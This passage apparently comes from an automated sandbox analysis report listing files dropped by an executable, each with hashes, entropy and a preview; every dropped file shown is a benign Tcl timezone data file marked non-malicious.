                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Nairobi) {.. {-9223372036854775808 8836 0 LMT}.. {-1946168836 9000 0 +0230}.. {-1309746600 10800 0 EAT}.. {-1261969200 9000 0 +0230}.. {-1041388200 9900 0 +0245}.. {-865305900 10800 0 EAT}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):208
                                                                                                                                                                                                                              Entropy (8bit):4.856754881865487
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2DjUfDm2OHNseoH1axCXFHzaSmkFWTvF9:MB862DjULmdHPC1XNzaS3yz
                                                                                                                                                                                                                              MD5:EDB548348E590C8CFE04ED172D96B86C
                                                                                                                                                                                                                              SHA1:AD3B631FB03819772164402E202AFA781687F597
                                                                                                                                                                                                                              SHA-256:9ADA5F5AFB25E823E1F0E8AD2489AAA1C09F01356634A9403670D7AB21CA2E2C
                                                                                                                                                                                                                              SHA-512:17E396A9BE497077B774AD1108CC8760ED35FC92F65FFF070F9ACD3C4FB67A335C1C57DF1CCB1570DE14B708EFCA0063990A969E30759C9A47731DA45ED25EFE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Ndjamena) {.. {-9223372036854775808 3612 0 LMT}.. {-1830387612 3600 0 WAT}.. {308703600 7200 1 WAST}.. {321314400 3600 0 WAT}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                              Entropy (8bit):4.871519187180041
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DcdhA9Ff2DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2Dsh2f2D1
                                                                                                                                                                                                                              MD5:0134039CD1666E983A9B6E43ABD6AF59
                                                                                                                                                                                                                              SHA1:A2A99345390F4D17C892CEADE58C604257686764
                                                                                                                                                                                                                              SHA-256:B517120AD8DB3F21EAB4E44A78001EE856EB4EA35852C54CCA96D38887DEBCFA
                                                                                                                                                                                                                              SHA-512:E5911ADD3D776D87ACFC986C4D2564E3ED9AB12C67F23391ED35FF2A31AD8314B873E31DB8DA4D5E0DAEA12BE34110A8F0C27C9C6126977BAD51C6AD5CDFA39B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Niamey) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):188
                                                                                                                                                                                                                              Entropy (8bit):4.909962899502589
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcboGb+DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2Dqbb+c
                                                                                                                                                                                                                              MD5:550E482599C2F4280F2C258019BB2547
                                                                                                                                                                                                                              SHA1:A39045BEF313094CEDC100A7D695AE51BC9E498D
                                                                                                                                                                                                                              SHA-256:64CAF2BF9D45095DF97F419714D5617CF6300ACDB544B621DCE1D594AA9B910C
                                                                                                                                                                                                                              SHA-512:4FD29C5B4C0D2BDE69C437E9BF4F08A11E1DAAA689B69F28F3551F550BDCCDD055E4C1A241EDB2FA48B18825AFF792F4860F55983E106EA8224F1D87ED4F7546
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Nouakchott) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.920023025906233
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcXCZDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2D1DBS
                                                                                                                                                                                                                              MD5:6CFC4E938E50C9B591F8CC42A14FA82A
                                                                                                                                                                                                                              SHA1:FCE14A5CA62C9005C76D27B849A238E76C834F8A
                                                                                                                                                                                                                              SHA-256:03B9C1FE350B5E9F6F333F9519FA394DCC562308D9388A903AF3D3FECEBDC762
                                                                                                                                                                                                                              SHA-512:98F22F1D23A9930276A2D306A1473E64DC43547A16CFD01226E4F030A26A3CC4FDED77F790583CC5C078FC6DFCCE81C16A50879AE46A0D3A6F1FA98373F413C7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Ouagadougou) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.893842293207225
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DcyTKM0DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2DQD4yn
                                                                                                                                                                                                                              MD5:6D979FCD225D5431C7391AE568C6409F
                                                                                                                                                                                                                              SHA1:6C9DCD222061CC00FD386773C6BB2861F3429A60
                                                                                                                                                                                                                              SHA-256:8FB8692DB9281AE2B087D704168BFD47D3D0901781FEF65BFD62FCB213BA6B50
                                                                                                                                                                                                                              SHA-512:32AFA6AF6BFC3D42CA636DD2B96906048EF1ADFBB135BB7E7B77C444FED99FDABB84FBBADF56EC63828FFA7B3371191FF1311822B1C75241EBD9CF602467088E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Porto-Novo) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):234
                                                                                                                                                                                                                              Entropy (8bit):4.818597723513168
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2DXDm2OHH5oHvzdoH1aNbbFHRMy:MB862DTmdHH5CvzdC16bZRMy
                                                                                                                                                                                                                              MD5:28A5967C797F4B38FB63F823D6F07168
                                                                                                                                                                                                                              SHA1:17872E91683B884191D2E4C777FB79DCE6D73EE7
                                                                                                                                                                                                                              SHA-256:BA1D60DF2B41320F92A123A714E17E576C89383526B96E0541A464C3FBA415B7
                                                                                                                                                                                                                              SHA-512:B335E3D3268631F3A71F4BAD59740F3A5222344E8223C201B8FE885BAA7F1A550FA7778E498D6DC2111F41053856F50B21413AECCE84B80833EC8176F2A1009C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Sao_Tome) {.. {-9223372036854775808 1616 0 LMT}.. {-2713912016 -2205 0 LMT}.. {-1830384000 0 0 GMT}.. {1514768400 3600 0 WAT}.. {1546304400 0 0 GMT}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):186
                                                                                                                                                                                                                              Entropy (8bit):4.905303708777235
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcHdDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DwdDBS
                                                                                                                                                                                                                              MD5:F2D7F7BC4EA3629EC7F0E45300A0CFD2
                                                                                                                                                                                                                              SHA1:E7594D378C5DCFEB1E87E13AC79A026260D2E630
                                                                                                                                                                                                                              SHA-256:9D8009ACAB019B32B1E87AB10E0AC3765ABCABE8066318DA8CA4905D41562F72
                                                                                                                                                                                                                              SHA-512:795E58172907020C85CF0B10BBA35842D5F92872CCB3382DFDC787BAA504C79927FA23BC3104AD63541A95C44CA80977E8247846DE918A0B00963B970F4823D2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Timbuktu) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):954
                                                                                                                                                                                                                              Entropy (8bit):4.151253074491018
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862DrmdHrCDWR+f7Zn9ueRSmNvlTtuyI/ZBv8dq8Jw4VFZBZYEuAENSfp8kSYx:5veuDkWx3NdT18kbjjAkxTx
                                                                                                                                                                                                                              MD5:2DF9B050D82B06EB89DA908C31C1F1C9
                                                                                                                                                                                                                              SHA1:CB294E12560A98D5CEA3BA7004B5519B6C22BAAC
                                                                                                                                                                                                                              SHA-256:B447B6B1C351E77F22A2D77C0437F2BBB7D8BDFDFDC3D6285E0D260519CC7110
                                                                                                                                                                                                                              SHA-512:BBE281D551E9F8DA7B6BB08D809177615410A11E4B1184ABD220EA8B1F355B2BBC090C6BAAF7E07FD61286891388ECD4026D4433C4E4B6A8D201F8D95E174532
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Tripoli) {.. {-9223372036854775808 3164 0 LMT}.. {-1577926364 3600 0 CET}.. {-574902000 7200 1 CEST}.. {-512175600 7200 1 CEST}.. {-449888400 7200 1 CEST}.. {-347158800 7200 0 EET}.. {378684000 3600 0 CET}.. {386463600 7200 1 CEST}.. {402271200 3600 0 CET}.. {417999600 7200 1 CEST}.. {433807200 3600 0 CET}.. {449622000 7200 1 CEST}.. {465429600 3600 0 CET}.. {481590000 7200 1 CEST}.. {496965600 3600 0 CET}.. {512953200 7200 1 CEST}.. {528674400 3600 0 CET}.. {544230000 7200 1 CEST}.. {560037600 3600 0 CET}.. {575852400 7200 1 CEST}.. {591660000 3600 0 CET}.. {607388400 7200 1 CEST}.. {623196000 3600 0 CET}.. {641775600 7200 0 EET}.. {844034400 3600 0 CET}.. {860108400 7200 1 CEST}.. {875919600 7200 0 EET}.. {1352505600 3600 0 CET}.. {1364515200 7200 1 CEST}.. {1382662800 7200 0 EET}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):4.150944563639585
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862DHmdHjCvbB/lxRjntMVyoKCyFWeey0XSe/OSyHaCgmvLOcSFQSFeSTC6ZPJ:5LemvbplxRhbv+yuh2tIee6kvcw9Cy
                                                                                                                                                                                                                              MD5:0C99335A41D33AA8BC1EDA0CB4CDCBF5
                                                                                                                                                                                                                              SHA1:5CABC28D318FA5B8307429EA571FFF91EB8E1252
                                                                                                                                                                                                                              SHA-256:0760D1028E733888E43E7F1E057217DC2B52786029FCEC67B27EB69CC6A54938
                                                                                                                                                                                                                              SHA-512:C8FE685ACA46FD4836F3AABC15833F294E5EBED123A487D04E74A8C5668BDFAFB96D2326760452A6E5A1B9CC25AC6C3918D8C10A7F8EF737456640E3000BBA2F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Tunis) {.. {-9223372036854775808 2444 0 LMT}.. {-2797202444 561 0 PMT}.. {-1855958961 3600 0 CET}.. {-969242400 7200 1 CEST}.. {-950493600 3600 0 CET}.. {-941940000 7200 1 CEST}.. {-891136800 3600 0 CET}.. {-877827600 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-842918400 3600 0 CET}.. {-842223600 7200 1 CEST}.. {-828230400 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796269600 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-766634400 3600 0 CET}.. {231202800 7200 1 CEST}.. {243903600 3600 0 CET}.. {262825200 7200 1 CEST}.. {276044400 3600 0 CET}.. {581122800 7200 1 CEST}.. {591145200 3600 0 CET}.. {606870000 7200 1 CEST}.. {622594800 3600 0 CET}.. {641516400 7200 1 CEST}.. {654649200 3600 0 CET}.. {1114902000 7200 1 CEST}.. {1128038400 3600 0 CET}.. {1143334800 7200 1 CEST}.. {1162083600 3600 0 CET}.. {11747
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1649
                                                                                                                                                                                                                              Entropy (8bit):3.9974091170263066
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5t+Lmcz0iMHHWMbnHoMcHiM0H+MCySHr/MDHqMafHO8MwHJMHHOMHSHWMHHXM5Hs:OLjQDI6jZ2WFcv
                                                                                                                                                                                                                              MD5:4846FB13467BA93EB134D88228D7F534
                                                                                                                                                                                                                              SHA1:477FC6144B7DF365606A2E44EF1430F8DF6FB841
                                                                                                                                                                                                                              SHA-256:DFC3D1FC182B315B31D999BC103C264BD205EB16F971C8636003A71170D7BD7C
                                                                                                                                                                                                                              SHA-512:A719F5083F66CE44FE047880A10B2ED04B66E01C7F0F7DADAE2FFB95172308F091D669BCFED5A236D2A0F80A4A1D78DA7A778DDE3FAECB40170ECDA705573769
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Windhoek) {.. {-9223372036854775808 4104 0 LMT}.. {-2458170504 5400 0 +0130}.. {-2109288600 7200 0 SAST}.. {-860976000 10800 1 SAST}.. {-845254800 7200 0 SAST}.. {637970400 7200 0 CAT}.. {764200800 3600 1 WAT}.. {778640400 7200 0 CAT}.. {796780800 3600 1 WAT}.. {810090000 7200 0 CAT}.. {828835200 3600 1 WAT}.. {841539600 7200 0 CAT}.. {860284800 3600 1 WAT}.. {873594000 7200 0 CAT}.. {891734400 3600 1 WAT}.. {905043600 7200 0 CAT}.. {923184000 3600 1 WAT}.. {936493200 7200 0 CAT}.. {954633600 3600 1 WAT}.. {967942800 7200 0 CAT}.. {986083200 3600 1 WAT}.. {999392400 7200 0 CAT}.. {1018137600 3600 1 WAT}.. {1030842000 7200 0 CAT}.. {1049587200 3600 1 WAT}.. {1062896400 7200 0 CAT}.. {1081036800 3600 1 WAT}.. {1094346000 7200 0 CAT}.. {1112486400 3600 1 WAT}.. {1125795600 7200 0 CAT}.. {1143936000 3600 1 WAT}.. {1157245200 7200
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8447
                                                                                                                                                                                                                              Entropy (8bit):3.867931581740766
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:6hvOs5vveFaHU6lgqN/zNMkixlrxYTMcmo1LWF59:6hvOstgqN/zNMkArxiZmf
                                                                                                                                                                                                                              MD5:DF52E726B33FA47EB115C1233614E101
                                                                                                                                                                                                                              SHA1:26B0E49022FCB929F0160617F9C9D2DBEDC63610
                                                                                                                                                                                                                              SHA-256:77231D179260C08690A70AEE6C2517E4B621ED4794D9AEEA7040539F4FF05111
                                                                                                                                                                                                                              SHA-512:48AAF25419E07B06E076B0E19F9A0C27EB257556E62FD8F7B2AA963A817823DD89D33AB6AFEAAC2EF2230361D76776355E19CC2BBBB4D19536F823A347AC8AA4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Adak) {.. {-9223372036854775808 44002 0 LMT}.. {-3225223727 -42398 0 LMT}.. {-2188944802 -39600 0 NST}.. {-883573200 -39600 0 NST}.. {-880196400 -36000 1 NWT}.. {-769395600 -36000 1 NPT}.. {-765374400 -39600 0 NST}.. {-757342800 -39600 0 NST}.. {-86878800 -39600 0 BST}.. {-31496400 -39600 0 BST}.. {-21466800 -36000 1 BDT}.. {-5745600 -39600 0 BST}.. {9982800 -36000 1 BDT}.. {25704000 -39600 0 BST}.. {41432400 -36000 1 BDT}.. {57758400 -39600 0 BST}.. {73486800 -36000 1 BDT}.. {89208000 -39600 0 BST}.. {104936400 -36000 1 BDT}.. {120657600 -39600 0 BST}.. {126709200 -36000 1 BDT}.. {152107200 -39600 0 BST}.. {162392400 -36000 1 BDT}.. {183556800 -39600 0 BST}.. {199285200 -36000 1 BDT}.. {215611200 -39600 0 BST}.. {230734800 -36000 1 BDT}.. {247060800 -39600 0 BST}.. {262789200 -36000 1 BDT}.. {278510400 -39600 0 BST}.. {29423880
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8685
                                                                                                                                                                                                                              Entropy (8bit):3.9620252256806845
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:esKLO6KLC9+j1giaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:etLhN9DiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                              MD5:BFEACEA04AAA8A69A9AC71CF86BCC15C
                                                                                                                                                                                                                              SHA1:1693971B8AAA35021BA34799FB1B9FADC3DA0294
                                                                                                                                                                                                                              SHA-256:DE7FBE2B3ED780C6B82099E1E249DD41F4452A3ADB9DD807B1D0EC06049C2302
                                                                                                                                                                                                                              SHA-512:E94112A2A5F268C03C58CE3BB4C243B2B9B0FC17CB27FDD58BCD2CCC8D377B805C87A552AE7DE1C5698C5F2C4B0FCAB00A3420B1DAD944C1A2F7A47CE7118F78
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Anchorage) {.. {-9223372036854775808 50424 0 LMT}.. {-3225223727 -35976 0 LMT}.. {-2188951224 -36000 0 AST}.. {-883576800 -36000 0 AST}.. {-880200000 -32400 1 AWT}.. {-769395600 -32400 1 APT}.. {-765378000 -36000 0 AST}.. {-86882400 -36000 0 AHST}.. {-31500000 -36000 0 AHST}.. {-21470400 -32400 1 AHDT}.. {-5749200 -36000 0 AHST}.. {9979200 -32400 1 AHDT}.. {25700400 -36000 0 AHST}.. {41428800 -32400 1 AHDT}.. {57754800 -36000 0 AHST}.. {73483200 -32400 1 AHDT}.. {89204400 -36000 0 AHST}.. {104932800 -32400 1 AHDT}.. {120654000 -36000 0 AHST}.. {126705600 -32400 1 AHDT}.. {152103600 -36000 0 AHST}.. {162388800 -32400 1 AHDT}.. {183553200 -36000 0 AHST}.. {199281600 -32400 1 AHDT}.. {215607600 -36000 0 AHST}.. {230731200 -32400 1 AHDT}.. {247057200 -36000 0 AHST}.. {262785600 -32400 1 AHDT}.. {278506800 -36000 0 AHST}.. {294235200 -3
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):202
                                                                                                                                                                                                                              Entropy (8bit):4.908728298285591
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290/8J5290ppv:MByMYbpwt290/8m90b
                                                                                                                                                                                                                              MD5:1C3CE9F156ABECEAA794E8F1F3A7ADDB
                                                                                                                                                                                                                              SHA1:6F84D0A424FD2DE85E3420EA320A186B277B0295
                                                                                                                                                                                                                              SHA-256:F38610019C0A2C18AC71F5AA108B9647D9B5C01DCB55211AFB8312308C41FE70
                                                                                                                                                                                                                              SHA-512:CA2DA6F9551E4DBF775D7D059F6F3399E0C4F2A428699726CD2A1B0BB17CCF5CDEEF645EE1759A2A349F3F29E0343600B89CE1F4659CF5D2B58280A381C018AD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Anguilla) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):201
                                                                                                                                                                                                                              Entropy (8bit):4.898881450964165
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290//MFe90ppv:MByMYbpwt290//V90b
                                                                                                                                                                                                                              MD5:DB16FFE76D625DEC731AB6320F5EF9BF
                                                                                                                                                                                                                              SHA1:D286994E03E4F82C08DE094B436FA098648AFADE
                                                                                                                                                                                                                              SHA-256:561E58E11DC5A86CAE04B5CB40F43EFCFF9ABC0C841FAC094619E9C5E0B403F8
                                                                                                                                                                                                                              SHA-512:8842B616205378AF78B0B2FC3F6517385845DE30FFD477A21ACFA0060D161FB6462A3C266DCFD54F101729446B8E1B2ECF463C9CF2E6CE227B2628A19AF365F9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Antigua) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1782
                                                                                                                                                                                                                              Entropy (8bit):3.733307964154526
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5KChlvEw6kSSx5H4a8tf3fkuozd23t8VZDG8+GCRRRd:QIlvEwJSSxdF8tfMuozdCt8VZy8+GCRB
                                                                                                                                                                                                                              MD5:9B01680A362EA7B462DC236F6A35E14C
                                                                                                                                                                                                                              SHA1:456A5E771F6B749BFDB2BFD59836A6A930499881
                                                                                                                                                                                                                              SHA-256:B1327CBEC20A21E3FF873E28A2EDFA271EE3A5C01933779300EABD6B185DA010
                                                                                                                                                                                                                              SHA-512:E6C2F5C489BEA31B0AAC3CB1DB750AC2B665DAC0AC82C1CE6756E768305300297BA5E3B32EDEB9E1715452F02223E47674C4F2B1844920F664623C9F34309240
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Araguaina) {.. {-9223372036854775808 -11568 0 LMT}.. {-1767214032 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2048
                                                                                                                                                                                                                              Entropy (8bit):3.7664759014118188
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5p9uuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwwfFC8OS0wi:jIu3pfe92jCs/VOHv2kdeRtnxafwwfF0
                                                                                                                                                                                                                              MD5:2B9A1EDE5110B46E24F4726664EA1E3F
                                                                                                                                                                                                                              SHA1:939D1A7A50544F34B318ACDB52BC6930FE453F6D
                                                                                                                                                                                                                              SHA-256:BC86AC89121EC4AA302F6259CCC97EFFD7022DC6CEE3B291C57DA72B6EA0C558
                                                                                                                                                                                                                              SHA-512:C204740DACBCECF2CC5CF4FEB687E86B9150512623203C999D6F4EB5FB246D07681A35C28D8445F6A50F49940C321E0AA5E51FE5A73B8ED076F29CEB5B4D4CA2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Buenos_Aires) {.. {-9223372036854775808 -14028 0 LMT}.. {-2372097972 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-7522
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2077
